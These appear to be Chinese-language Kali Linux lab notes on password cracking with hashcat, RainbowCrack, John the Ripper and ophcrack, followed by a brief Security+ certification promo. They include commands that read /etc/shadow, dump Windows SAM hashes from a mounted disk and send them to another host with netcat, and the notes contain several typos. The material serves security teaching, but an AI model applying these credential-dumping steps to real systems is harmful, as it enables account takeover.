



- 虚拟机中无法使用

- 支持CUDA技术的Nvidia显卡

- 支持OpenCL技术的AMD显卡

- 安装相应的驱动


- 最大密码长度55字符

- 使用Unicode的最大密码长度27字符



- oclHashcat-plus、oclHashcat-lite已经合并为oclhashcat


- olHashcat -m 0 hash.txt -a 3 ?a?a?a?a?a?a?a

- ?| = abcdefghijklmnopqrstuvwxyz


- ?d = 0123456789

- ?s = !"#$%&'()*+,-./:;<=>?@[\]^-`{|}~

- ?a = ?|?u?d?s

- ?b = 0x00 - 0xff




计算HASH的速度很慢,修改版支持CUDA GPU

- https://www.freeainbowtables.com/en/download/


- rtgen : 预算,生成彩虹表,耗时的阶段

- rtsort : 对rtgen生成的彩虹表进行排序

- rcrack : 查找彩虹表破解密码

- 以上命令必须顺序使用



- 密码明文、HASH值、HASH算法、字符集、明文长度范围



- rtgen md5 loweralpha 1 5 0 10000 10000 0

- 计算彩虹表时间可能很长


- http://www/freerainbowtables.com/en/tables/

- http://rainbowtables.shmoo.com/

root@k:~# oclhashcat -h

oclHashcat, advanced password recovery

Usage: oclHashcat [options]... hash|hashfile|hccapfile [dictionary|mask|directory]...




* General:

-m,  --hash-type=NUM               Hash-type, see references below

-a,  --attack-mode=NUM             Attack-mode, see references below

-V,  --version                     Print version

-h,  --help                        Print help

--quiet                       Suppress output

* Benchmark:

-b,  --benchmark                   Run benchmark

--benchmark-mode=NUM          Benchmark-mode, see references below

* Misc:

--hex-charset                 Assume charset is given in hex

--hex-salt                    Assume salt is given in hex

--hex-wordlist                Assume words in wordlist is given in hex

--force                       Ignore warnings

--status                      Enable automatic update of the status-screen

--status-timer=NUM            Seconds between status-screen update

--status-automat              Display the status view in a machine readable format

--loopback                    Add new plains to induct directory

--weak-hash-threshold=NUM     Threshold when to stop checking for weak hashes, default is 100 salts

* Markov:

--markov-hcstat=FILE          Specify hcstat file to use, default is hashcat.hcstat

--markov-disable              Disables markov-chains, emulates classic brute-force

--markov-classic              Enables classic markov-chains, no per-position enhancement

-t,  --markov-threshold=NUM        Threshold when to stop accepting new markov-chains

* Session:

--runtime=NUM                 Abort session after NUM seconds of runtime

--session=STR                 Define specific session name

--restore                     Restore session from --session

--restore-disable             Do not write restore file

* Files:

-o,  --outfile=FILE                Define outfile for recovered hash

--outfile-format=NUM          Define outfile-format for recovered hash, see references below

--outfile-autohex-disable     Disable the use of $HEX[] in output plains

--outfile-check-timer=NUM     Seconds between outfile checks

-p,  --separator=CHAR              Separator char for hashlists and outfile

--show                        Show cracked passwords only

--left                        Show un-cracked passwords only

--username                    Enable ignoring of usernames in hashfile (recommended: also use --show)

--remove                      Enable remove of hash once it is cracked

--remove-timer=NUM            Update input hash file each NUM seconds

--potfile-disable             Do not write potfile

--debug-mode=NUM              Defines the debug mode (hybrid only by using rules), see references below

--debug-file=FILE             Output file for debugging rules (see also --debug-mode)

--induction-dir=FOLDER        Specify induction directory to use, default is $session.induct

--outfile-check-dir=FOLDER    Specify the outfile directory which should be monitored, default is $session.outfiles

--logfile-disable             Disable the logfile

--truecrypt-keyfiles=FILE     Keyfiles used, separate with comma

* Resources:

-c,  --segment-size=NUM            Size in MB to cache from the wordfile

--bitmap-min=NUM              Minimum number of bits allowed for bitmaps

--bitmap-max=NUM              Maximum number of bits allowed for bitmaps

--cpu-affinity=STR            Locks to CPU devices, separate with comma

--opencl-platforms=STR        OpenCL platforms to use, separate with comma

-d,  --opencl-devices=STR          OpenCL devices to use, separate with comma

--opencl-device-types=STR     OpenCL device-types to use, separate with comma, see references below

-w,  --workload-profile=NUM        Enable a specific workload profile, see references below

-n,  --kernel-accel=NUM            Workload tuning: 1, 8, 40, 80, 160

-u,  --kernel-loops=NUM            Workload fine-tuning: 8 - 1024

--gpu-temp-disable            Disable temperature and fanspeed readings and triggers

--gpu-temp-abort=NUM          Abort session if GPU temperature reaches NUM degrees celsius

--gpu-temp-retain=NUM         Try to retain GPU temperature at NUM degrees celsius (AMD only)

--powertune-enable            Enable automatic power tuning option (AMD OverDrive 6 only)

--scrypt-tmto=NUM             Manually override automatically calculated TMTO value for scrypt

* Distributed:

-s,  --skip=NUM                    Skip number of words

-l,  --limit=NUM                   Limit number of words

--keyspace                    Show keyspace base:mod values and quit

* Rules:

-j,  --rule-left=RULE              Single rule applied to each word from left dict

-k,  --rule-right=RULE             Single rule applied to each word from right dict

-r,  --rules-file=FILE             Rules-file, multi use: -r 1.rule -r 2.rule

-g,  --generate-rules=NUM          Generate NUM random rules

--generate-rules-func-min=NUM Force NUM functions per random rule min

--generate-rules-func-max=NUM Force NUM functions per random rule max

--generate-rules-seed=NUM     Force RNG seed to NUM

* Custom charsets:

-1,  --custom-charset1=CS          User-defined charsets

-2,  --custom-charset2=CS          Example:

-3,  --custom-charset3=CS          --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef

-4,  --custom-charset4=CS          -2 mycharset.hcchr : sets charset ?2 to chars contained in file

* Increment:

-i,  --increment                   Enable increment mode

--increment-min=NUM           Start incrementing at NUM

--increment-max=NUM           Stop incrementing at NUM




* Workload Profile:

1 = Reduced performance profile (low latency desktop)

2 = Default performance profile

3 = Tuned   performance profile (high latency desktop)

* Benchmark Settings:

0 = Manual Tuning

1 = Performance Tuning, default

* OpenCL device-types:

1 = CPU devices

2 = GPU devices

3 = Accelerator devices (FPGA, CELL Blade, etc.)

* Outfile Formats:

1 = hash[:salt]

2 = plain

3 = hash[:salt]:plain

4 = hex_plain

5 = hash[:salt]:hex_plain

6 = plain:hex_plain

7 = hash[:salt]:plain:hex_plain

8 = crackpos

9 = hash[:salt]:crackpos

10 = plain:crackpos

11 = hash[:salt]:plain:crackpos

12 = hex_plain:crackpos

13 = hash[:salt]:hex_plain:crackpos

14 = plain:hex_plain:crackpos

15 = hash[:salt]:plain:hex_plain:crackpos

* Debug mode output formats (for hybrid mode only, by using rules):

1 = save finding rule

2 = save original word

3 = save original word and finding rule

4 = save original word, finding rule and modified plain

* Built-in charsets:

?l = abcdefghijklmnopqrstuvwxyz


?d = 0123456789

?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

?a = ?l?u?d?s

?b = 0x00 - 0xff

* Attack modes:

0 = Straight

1 = Combination

3 = Brute-force

6 = Hybrid dict + mask

7 = Hybrid mask + dict

* Hash types:

[[ Roll-your-own: Raw Hashes ]]

900 = MD4

0 = MD5

5100 = Half MD5

100 = SHA1

10800 = SHA-384

1400 = SHA-256

1700 = SHA-512

5000 = SHA-3(Keccak)

10100 = SipHash

6000 = RipeMD160

6100 = Whirlpool

6900 = GOST R 34.11-94

11700 = GOST R 34.11-2012 (Streebog) 256-bit

11800 = GOST R 34.11-2012 (Streebog) 512-bit

[[ Roll-your-own: Iterated and / or Salted Hashes ]]

10 = md5($pass.$salt)

20 = md5($salt.$pass)

30 = md5(unicode($pass).$salt)

40 = md5($salt.unicode($pass))

3800 = md5($salt.$pass.$salt)

3710 = md5($salt.md5($pass))

2600 = md5(md5($pass)

4300 = md5(strtoupper(md5($pass)))

4400 = md5(sha1($pass))

110 = sha1($pass.$salt)

120 = sha1($salt.$pass)

130 = sha1(unicode($pass).$salt)

140 = sha1($salt.unicode($pass))

4500 = sha1(sha1($pass)

4700 = sha1(md5($pass))

4900 = sha1($salt.$pass.$salt)

1410 = sha256($pass.$salt)

1420 = sha256($salt.$pass)

1430 = sha256(unicode($pass).$salt)

1440 = sha256($salt.unicode($pass))

1710 = sha512($pass.$salt)

1720 = sha512($salt.$pass)

1730 = sha512(unicode($pass).$salt)

1740 = sha512($salt.unicode($pass))

[[ Roll-your-own: Authenticated Hashes ]]

50 = HMAC-MD5 (key = $pass)

60 = HMAC-MD5 (key = $salt)

150 = HMAC-SHA1 (key = $pass)

160 = HMAC-SHA1 (key = $salt)

1450 = HMAC-SHA256 (key = $pass)

1460 = HMAC-SHA256 (key = $salt)

1750 = HMAC-SHA512 (key = $pass)

1760 = HMAC-SHA512 (key = $salt)

` Generic KDF `

400 = phpass

8900 = scrypt

11900 = PBKDF2-HMAC-MD5

12000 = PBKDF2-HMAC-SHA1

10900 = PBKDF2-HMAC-SHA256

12100 = PBKDF2-HMAC-SHA512

[[ Network protocols, Challenge-Response ]]

23 = Skype

2500 = WPA/WPA2

4800 = iSCSI CHAP authentication, MD5(Chap)

5300 = IKE-PSK MD5

5400 = IKE-PSK SHA1

5500 = NetNTLMv1

5500 = NetNTLMv1 + ESS

5600 = NetNTLMv2


7500 = Kerberos 5 AS-REQ Pre-Auth etype 23

8300 = DNSSEC (NSEC3)

10200 = Cram MD5

11100 = PostgreSQL Challenge-Response Authentication (MD5)

11200 = MySQL Challenge-Response Authentication (SHA1)

11400 = SIP digest authentication (MD5)

[[ Forums, CMS, E-Commerce, Frameworks, Middleware, Wiki, Management ]]

121 = SMF (Simple Machines Forum)

400 = phpBB3

2611 = vBulletin < v3.8.5

2711 = vBulletin > v3.8.5

2811 = MyBB

2811 = IPB (Invison Power Board)

8400 = WBB3 (Woltlab Burning Board)

11 = Joomla < 2.5.18

400 = Joomla > 2.5.18

400 = Wordpress

2612 = PHPS

7900 = Drupal7

21 = osCommerce

21 = xt:Commerce

11000 = PrestaShop

124 = Django (SHA-1)

10000 = Django (PBKDF2-SHA256)

3711 = Mediawiki B type

7600 = Redmine

` Database Server `

12 = PostgreSQL

131 = MSSQL(2000)

132 = MSSQL(2005)

1731 = MSSQL(2012)

1731 = MSSQL(2014)

200 = MySQL323

300 = MySQL4.1/MySQL5

3100 = Oracle H: Type (Oracle 7+)

112 = Oracle S: Type (Oracle 11+)

12300 = Oracle T: Type (Oracle 12+)

8000 = Sybase ASE

[[ HTTP, SMTP, LDAP Server ]]

141 = EPiServer 6.x < v4

1441 = EPiServer 6.x > v4

1600 = Apache $apr1$

12600 = ColdFusion 10+

1421 = hMailServer

101 = nsldap, SHA-1(Base64), Netscape LDAP SHA

111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA

1711 = SSHA-512(Base64), LDAP {SSHA512}

` Checksums `

11500 = CRC32

` Operating-Systems `

3000 = LM

1000 = NTLM

1100 = Domain Cached Credentials (DCC), MS Cache

2100 = Domain Cached Credentials 2 (DCC2), MS Cache 2

12800 = MS-AzureSync PBKDF2-HMAC-SHA256

1500 = descrypt, DES(Unix), Traditional DES

12400 = BSDiCrypt, Extended DES

500 = md5crypt $1$, MD5(Unix)

3200 = bcrypt $2*$, Blowfish(Unix)

7400 = sha256crypt $5$, SHA256(Unix)

1800 = sha512crypt $6$, SHA512(Unix)

122 = OSX v10.4

122 = OSX v10.5

122 = OSX v10.6

1722 = OSX v10.7

7100 = OSX v10.8

7100 = OSX v10.9

7100 = OSX v10.10

6300 = AIX {smd5}

6700 = AIX {ssha1}

6400 = AIX {ssha256}

6500 = AIX {ssha512}

2400 = Cisco-PIX

2410 = Cisco-ASA

500 = Cisco-IOS $1$

5700 = Cisco-IOS $4$

9200 = Cisco-IOS $8$

9300 = Cisco-IOS $9$

22 = Juniper Netscreen/SSG (ScreenOS)

501 = Juniper IVE

5800 = Android PIN

8100 = Citrix Netscaler

8500 = RACF

7200 = GRUB 2

9900 = Radmin2

[[ Enterprise Application Software (EAS) ]]




8600 = Lotus Notes/Domino 5

8700 = Lotus Notes/Domino 6

9100 = Lotus Notes/Domino 8

133 = PeopleSoft

` Archives `

11600 = 7-Zip

12500 = RAR3-hp

13000 = RAR5

[[ Full-Disk encryptions (FDE) ]]

62XY = TrueCrypt 5.0+

X  = 1 = PBKDF2-HMAC-RipeMD160

X  = 2 = PBKDF2-HMAC-SHA512

X  = 3 = PBKDF2-HMAC-Whirlpool

X  = 4 = PBKDF2-HMAC-RipeMD160 + boot-mode

Y = 1 = XTS  512 bit (Ciphers: AES or Serpent or Twofish)

Y = 2 = XTS 1024 bit (Ciphers: AES or Serpent or Twofish or AES-Twofish or Serpent-AES or Twofish-Serpent)

Y = 3 = XTS 1536 bit (Ciphers: All)

8800 = Android FDE < v4.3

12900 = Android FDE (Samsung DEK)

12200 = eCryptfs

` Documents `

9700 = MS Office <= 2003 MD5 + RC4, oldoffice$0, oldoffice$1

9710 = MS Office <= 2003 MD5 + RC4, collider-mode #1

9720 = MS Office <= 2003 MD5 + RC4, collider-mode #2

9800 = MS Office <= 2003 SHA1 + RC4, oldoffice$3, oldoffice$4

9810 = MS Office <= 2003 SHA1 + RC4, collider-mode #1

9820 = MS Office <= 2003 SHA1 + RC4, collider-mode #2

9400 = MS Office 2007

9500 = MS Office 2010

9600 = MS Office 2013

10400 = PDF 1.1 - 1.3 (Acrobat 2 - 4)

10410 = PDF 1.1 - 1.3 (Acrobat 2 - 4) + collider-mode #1

10420 = PDF 1.1 - 1.3 (Acrobat 2 - 4) + collider-mode #2

10500 = PDF 1.4 - 1.6 (Acrobat 5 - 8)

10600 = PDF 1.7 Level 3 (Acrobat 9)

10700 = PDF 1.7 Level 8 (Acrobat 10 - 11)

` Password Managers `

9000 = Password Safe v2

5200 = Password Safe v3

6800 = Lastpass

6600 = 1Password, agilekeychain

8200 = 1Password, cloudkeychain

11300 = Bitcoin/Litecoin wallet.dat

12700 = Blockchain, My Wallet

root@k:~# rtgen

RainbowCrack 1.6.1

Copyright 2003-2015 RainbowCrack Project. All rights reserved.


usage: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index -bench

hash algorithms implemented in alglib0.so:

lm, plaintext_len limit: 0 - 7

ntlm, plaintext_len limit: 0 - 15

md5, plaintext_len limit: 0 - 15

sha1, plaintext_len limit: 0 - 20

sha256, plaintext_len limit: 0 - 20

example: rtgen md5 loweralpha 1 7 0 1000 1000 0

rtgen md5 loweralpha 1 7 0 -bench

root@k:~# rtgen md5 loweralpha 1 5 0 10000 10000 0

rainbow table md5_loweralpha#1-5_0_10000x10000_0.rt parameters

hash algorithm:         md5

hash length:            16

charset:                abcdefghijklmnopqrstuvwxyz

charset in hex:         61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a

charset length:         26

plaintext length range: 1 - 5

reduce offset:          0x00000000

plaintext total:        12356630

sequential starting point begin from 0 (0x0000000000000000)


10000 of 10000 rainbow chains generated (0 m 23.9 s)

root@k:~# cd /usr/share/rainbowcrack

root@k:/usr/share/rainbowcrack# ls

alglibo.so  charset.txt  md5_loweralpha#1-5_0_10000x10000_0.rt  rcrack  readme.txt rt2rtc  rtc2rt rtgen rtsort



- /usr/share/rainbowcrack

- rtsort /md5_loweralpha#1-5_0_10000x10000_0.rt


- rcrack *rt -h 5d41402anc4b2a769719d911017c592

- rcrack *rt -l hash.txt

root@k:/usr/share/rainbowcrack# echo ab56b4d92b40713acc5af89985d4b786 > hash

root@k:/usr/share/rainbowcrack# rcrack md5_loweralpha#1-5_0_10000x10000_0.rt -h ab56b4d92b40713acc5af89985d4b786

710767411 bytes memory available

1 x 160000 bytes memory allocated for table buffer

160000 bytes memory allocated for chain traverse

disk: md5_loweralpha#1-5_0_10000x10000_0.rt: 160000 bytes read

root@k:/usr/share/rainbowcrack# crack md5_loweralpha#1-5_0_10000x10000_0.rt -l hash



- john --list=formats



- Wordlist : 基于规则的字典破解

- Single crack : 默认被首先执行,使用Login/GECOS信息尝试破解

- Incremental : 所有或指定字符集的暴力破解

- Exteral :需要在主配配文件中的C语言子集编程


john --list=formats

Created directory: /root/.john

descrypt, bsdicrypt, md5crypt, bcrypt, scrypt, LM, AFS, tripcode, dummy,

dynamic_n, bfegg, dmd5, dominosec, dominosec8, EPI, Fortigate, FormSpring,

has-160, hdaa, ipb2, krb4, krb5, KeePass, MSCHAPv2, mschapv2-naive, mysql,

nethalflm, netlm, netlmv2, netntlm, netntlm-naive, netntlmv2, md5ns, NT, osc,

PHPS, po, skey, SybaseASE, xsha, xsha512, agilekeychain, aix-ssha1,

aix-ssha256, aix-ssha512, asa-md5, Bitcoin, Blackberry-ES10, WoWSRP,

Blockchain, chap, Clipperz, cloudkeychain, cq, CRC32, sha1crypt, sha256crypt,

sha512crypt, Citrix_NS10, dahua, Django, django-scrypt, dmg, dragonfly3-32,

dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, EFS, eigrp,

EncFS, EPiServer, fde, gost, gpg, HAVAL-128-4, HAVAL-256-3, HMAC-MD5,

HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512, hMailServer,

hsrp, IKE, keychain, keyring, keystore, known_hosts, krb5-18, krb5pa-sha1,

kwallet, lp, lotus5, lotus85, LUKS, MD2, md4-gen, mdc2, MediaWiki, MongoDB,

Mozilla, mscash, mscash2, krb5pa-md5, mssql, mssql05, mssql12, mysql-sha1,

mysqlna, net-md5, net-sha1, nk, nsldap, o5logon, ODF, Office, oldoffice,

OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, Panama,

pbkdf2-hmac-md5, PBKDF2-HMAC-SHA1, PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512,

PDF, PFX, phpass, pix-md5, plaintext, pomelo, postgres, PST, PuTTY, pwsafe,

RACF, RAdmin, RAKP, rar, RAR5, Raw-SHA512, Raw-Blake2, Raw-Keccak,

Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-SHA1, Raw-SHA1-Linkedin, Raw-SHA224,

Raw-SHA256, Raw-SHA256-ng, Raw-SHA3, Raw-SHA384, Raw-SHA512-ng, Raw-SHA,

Raw-MD5u, ripemd-128, ripemd-160, rsvp, Siemens-S7, Salted-SHA1, SSHA512,

sapb, sapg, saph, 7z, sha1-gen, Raw-SHA1-ng, SIP, skein-256, skein-512,

aix-smd5, Snefru-128, Snefru-256, LastPass, SSH, SSH-ng, Stribog-256,

Stribog-512, STRIP, SunMD5, sxc, Sybase-PROP, tcp-md5, Tiger, tc_aes_xts,

tc_ripemd160, tc_sha512, tc_whirlpool, VNC, vtp, wbb3, whirlpool, whirlpool0,

whirlpool1, wpapsk, ZIP, NT-old, crypt

root@K:~# adduser yuanfh

Adding user: yuanfh' ...

Adding new group yuanfh' (1001) ...

Adding new user yuanfh' (1001) with group yuanfh' ...

Creating  home directory /home/yuanfh' ...

Copyting files from /etc/skel' ...

Enter new UNIX password: 1234

Retype new UNIX password: 1234

passwd: password updated successfully

Changing the user information for yuanfh

Enter the new value, or press ENTER for the default

Full Name []: fanghong.yuan

Room Number []: ROOM 222

Work Phone []: 010-20000000

Home Phone []: 010-22000000

Other []: baskeball

Is the information correct? [Y/n] Y

root@K:~# cat /etc/passwd/

root@K:~# ls -l /etc/passwd

-rw-r--r-- 1 root root 3186 4月  27  22:50 /etc/passwd

root@K:~# cat /etc/shadow

root@K:~# ls -l /etc/shadow

-rw-r----- 1 root shadow 1877 4月  27 22:49 /etc/shadow

root@K:~# adduser zhangsan

Adding user: zhangsan' ...

Adding new group zhangsan' (1002) ...

Adding new user zhangsan' (1001) with group zhangsan' ...

Creating  home directory /home/zhangsan' ...

Copyting files from /etc/skel' ...

Enter new UNIX password: 1234

Retype new UNIX password: 1234

passwd: password updated successfully

Changing the user information for zhangsan

Enter the new value, or press ENTER for the default

Full Name []:

Room Number []:

Work Phone []:

Home Phone []:

Other []:

Is the information correct? [Y/n]

root@K:~# cat /etc/passwd/


root@k:~# chfn -h

chfn: option requires an argument -- 'h'

用法:chfn [选项] [登录]


-f, --full-name FULL_NAME     更改用户的全名

-h, --home-phone HOME_PHONE   更改用户的家庭电话号码

-o, --other OTHER_INFO        更改用户的其它 GECOS 信息

-r, --room ROOM_NUMBER        更改用户的房间号

-R, --root CHROOT_DIR         chroot 到的目录

-u, --help                    显示此帮助信息并推出

-w, --work-phone WORK_PHONE   更改用户的办公室电话号码



- Single、wordlist、incremental

- 主配置文件中指定默认wordlist


#Default wordlist file name (including in batch mode)

wordlist = $JOHN/password.lst


- unshadow /etc/passwd /etc/shadow > pass.txt

- john pass.txt

- john --show pass

root@k:~# cat /etc/john/john.conf

root@k:~# unshadow /etc/passwd /etc/shadow > pass.txt

root@k:~# cat pass.txt

root@k:~# john pass.txt

warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"

Use the "--format=crypt" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVx 2x])

Press 'q' or Ctrl C to abort, almost any other key for status

0g 0:00:01:30 43.35% 1/3 (ETA: 23:11:25 0g/s 200.2p/s 200.2c/s 200.2C/s F-010..yuan-room

0g 0:00:01:40 51.20% 1/3 (ETA: 23:11:13 0g/s 199.6p/s 199.6c/s 199.6C/s F0000000..Yoom

0g 0:00:01:42 52.50% 1/3 (ETA: 23:11:12 0g/s 199.2p/s 199.2c/s 199.2C/s y.uanfh20000000.. f.anghongroom

0g 0:00:01:43 52.77% 1/3 (ETA: 23:11:13 0g/s 199.2p/s 199.2c/s 199.2C/s Ro.omyuan..R2.0000000

0g 0:00:01:45 53.51% 1/3 (ETA: 23:11:14 0g/s 199.5p/s 199.5c/s 199.5C/s y22217..fyuanfh17

0g 0:00:02:23 56.08% 1/3 (ETA: 23:11:34 0g/s 201.1p/s 201.1c/s 201.1C/s yroomx..roomx

0g 0:00:02:25 66.73% 1/3 (ETA: 23:11:35 0g/s 200.8p/s 200.8c/s 200.8C/s Room222D..YuanfhE

0g 0:00:02:26 67.10% 1/3 (ETA: 23:11:35 0g/s 200.9p/s 200.9c/s 200.9C/s Room20000000H..YyuanI

0g 0:00:03:05 80.50% 1/3 (ETA: 23:11:47 0g/s 202.3p/s 202.3c/s 202.3C/s ryuanfh888..room010888

0g 0:00:03:16 84.01% 1/3 (ETA: 23:11:51 0g/s 202.5p/s 202.5c/s 202.5C/s yuanyuanfh22222..y22222222

0g 0:00:03:18 84.75% 1/3 (ETA: 23:11:51 0g/s 202.6p/s 202.6c/s 202.6C/s root33333..Root00000

1234               (yuanfh)

1234               (zhangsan)

zg 0:00:04:15 0.05% 2/3 (ETA: 2016-05-03 21:56) 0.007836g/s 198.6p/s 199.1c/s 199.1C/s rokie..snapper

root@k:~# grep 1234 /usr/share/john/password.lst


















root@k:~# john --show pass.txt



2 password hashed cracked, 1 left

root@k:~# cat pass.txt

root@k:~# cd .john/

root@k:/.john# ls

john.log  john.pot  john.rec

root@k:/.john# cat john.pot

root@k:/.john# cat john.log

root@k:/.john# cat john rec

root@kali:~# fdisk -l    //查看分区

Disk /dev/sha: 80 GiB, 85899345920 bytes, 16772160 sectors

UNits: sectors of 1 * 512 = 512 bytes

Sector size (logical/physical): 512 bytes /512 bytes

I/O size (minimum/optimal): 512 bytes / 512 bytes

Disklablel type: dos

Disk identifier: 0x6852cbef

Device    Boot  Start      End   Sectors  Size ID Type

/dev/sdal *      2048   206847    204800  100M  7 HPFS/NTFS/exFAX

/dev/sda2      206848 16770111 167563264 79.9G  7 HPFS/NTFS/exFAX

root@kali:~# mount /dev/sha2 /mnt/                  //kali 1.0

root@kali:/mnt# cd /mnt/Windows/System32/config

root@kali:/mnt/Windows/System32/config# bkhive

bkhive 1.1.1 by Objectif Securite


original author: ncuomo@studenti.unia.it


bkhive systemhive keyfile

root@kali:/mnt/Windows/System32/config# bkhive SYSTEM k.txt

bkhive 1.1.1 by Objectif Securite


original author: ncuomo@studenti.unia.it

Root Key : CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}

Default ControlSet: 001

Bootkey: 1ac3a60c14471873eab1fad024c42cc4

root@kali:/mnt/Windows/System32/config# samdump2 SAM k.txt

samdump2 1.1.1 by Objectif Securite


original author: ncuomo@studenti.unia.it

Root Key : CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}




root@kali:/mnt/Windows/System32/config# cat sam.hash




- john sam.dump --wordlist=password.lst --format=nt

- john sam.dump --format=nt --show


root@k:~# nc -nvlp 333

Listening on [any] 333 ...

connect to [] from (UNKNOWN) [] 47279


root@kali:/mnt/Windows/System32/config# nc < sam.hash -q 1

root@k:~# ls

Destop  Documents  Downloads  Music  pass.txt  Pictures  Public  README.qz  RULES.gz  sam.hash  Templates  Videos

root@k:~# cat sam.hash


root@k:~# cp /sur/share/john/password.lst .    //复制到主目录下

root@k:~# echo vv >>passsword.lst

root@k:~# john sam.hash --wordlist=password.lst --format=nt

Using default input encoding: UTF-8

Press 'q' or Ctrl-c to abort, almost any other key for status


lg 0:00:00:00 DONE (2016-04-27 23:41) 12.50g/s 44337p/s 44337c/s 44337C/s dirk..vv

Use the " --show" option to display all of the cracked passwords reliably

Session completed

root@k:~# john sam.hash --format=nt --show


1 password hash cracked, 0 left

root@k:~# johnny    //图形化界面的john



彩虹表: http://ophcrack.sourceforge.net/tables.php

root@k:~# ophcrack


root@k:~# cp /media/sf_D_DRIVE/

root@k:~# cp /media/sf_D_DRIVE/tables_xp_free_small.zip .    //复制到主目录下






Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。



原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。


原因二: IT运维人员工作与翻身的利器。







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